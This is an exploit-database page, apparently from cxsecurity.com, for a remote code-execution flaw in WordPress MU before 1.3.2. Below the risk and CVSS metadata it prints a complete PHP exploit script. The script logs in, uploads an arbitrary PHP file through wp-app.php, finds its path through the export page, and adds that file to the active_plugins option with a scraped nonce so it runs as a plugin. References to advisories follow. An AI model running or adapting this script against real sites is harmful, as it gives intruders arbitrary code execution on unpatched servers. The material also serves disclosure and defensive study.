Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit

2008.12.23
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 8.5/10
Impact Subscore: 10/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /* WordPress [MU] blog's options overwrite Credits : Alexander Concha <alex at buayacorp dot com> Website : http://www.buayacorp.com/ Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html This exploit uses active_plugins option to execute arbitrary PHP */ include_once './class-snoopy.php'; // Fix Snoopy class SnoopyExt extends Snoopy { function _prepare_post_body($formvars, $formfiles) { if ( is_string($formvars) ) { return $formvars; } return parent::_prepare_post_body($formvars, $formfiles); } } set_time_limit( 0 ); // Any user with 'manage_options' and 'upload_files' capabilities $user = 'user'; $pass = '1234'; $blog_url = 'http://localhost.localdomain/mu/'; $remote_file = ''; // relative path to wp-content $local_file = ''; // the contents of this file, if any, will be uploaded $snoopy = new SnoopyExt(); $snoopy->maxredirs = 0; $snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check'; $snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass)); $snoopy->setcookies(); // Set auth cookies for future requests if ( empty($remote_file) ) { // Upload a new file $snoopy->_submit_type = 'image/gif'; $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents()); if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) { $remote_file = basename($match[1]); } } if ( empty($remote_file) ) die('Exploit failed...'); // Look for real path $snoopy->fetch("{$blog_url}wp-admin/export.php?download"); if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) { $remote_file = preg_replace('#.*?wp-content#', '', $match[1]); } if ( empty($remote_file) ) die('Exploit failed...'); // It asumes that file uploads are stored within wp-content $remote_file = '../' . ltrim($remote_file, '/'); $snoopy->fetch("{$blog_url}wp-admin/plugins.php"); // Recover previous active plugins $active_plugins = array(); if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) { foreach ($matches[0] as $plugin) { if ( preg_match('#plugin=([^&]+)#', $plugin, $match) ) $active_plugins[] = urldecode($match[1]); } print_r($active_plugins); } $active_plugins[] = $remote_file; // Fetch a valid nonce $snoopy->fetch("{$blog_url}wp-admin/options-general.php"); if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) { // Finally update active_plugins $snoopy->set_submit_normal(); $snoopy->submit("{$blog_url}wp-admin/options.php", array( 'active_plugins' => $active_plugins, '_wpnonce' => $match[1], 'action' => 'update', 'page_options' => 'active_plugins', )); } function get_contents() { global $local_file; return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>'; } ?>

References:

http://www.milw0rm.com/exploits/5066
http://www.buayacorp.com/files/wordpress/wp-blog-option-overwrite.txt
http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
http://secunia.com/advisories/28789
http://mu.wordpress.org/forums/topic.php?id=7534&amp;page&amp;replies=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top